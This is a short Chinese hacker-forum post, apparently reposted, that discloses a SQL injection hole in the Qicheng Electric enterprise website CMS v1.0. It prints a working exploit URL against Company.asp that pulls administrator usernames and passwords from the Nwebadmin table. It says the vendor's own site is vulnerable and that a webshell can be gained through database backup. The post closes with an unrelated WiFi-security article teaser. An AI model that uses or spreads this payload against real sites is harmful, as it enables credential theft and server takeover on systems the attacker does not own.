企成电气公司企业网站管理系统v1.0(中英文版)漏洞

话说天天看90sec的大牛们无聊乱丢Oday，小菜我等实在是诚惶诚恐啊。。。

在站长之家下了个小程序，一个简单的漏洞。。大牛莫笑，，不要踩俺。。谢谢。。

文件：Company.asp

什么都没过滤。。

exp：

Company.asp?id=2 union select 1,username,password,4,5,6,7,8 from Nwebadmin

官网也存在。。

备份数据库可以拿到shell。

PS:chmodx大大真的是个好人，教会了我很多。爱死他了~~~~~

转自：http://www.90sec.org/thread-1640-1-1.html

文章来源于lcx.cc:企成电气公司企业网站管理系统v1.0(中英文版)漏洞

相关推荐: 使用WiFi真的有那么危险吗？安全科普：教你增强自己的无线网络安全

0x00 背景 在知乎专栏上看到一篇文章《WiFi里的猫腻》，作者继续之前宣传的路由威胁，在互联网上疯传，搞得周围好多不懂的朋友一直问： 路由这么危险，我该怎么办啊？？？ 在这篇文章之前，作者及其团队成员就已经开始宣传路由的危险，似乎每个人用路由的人都会被别人…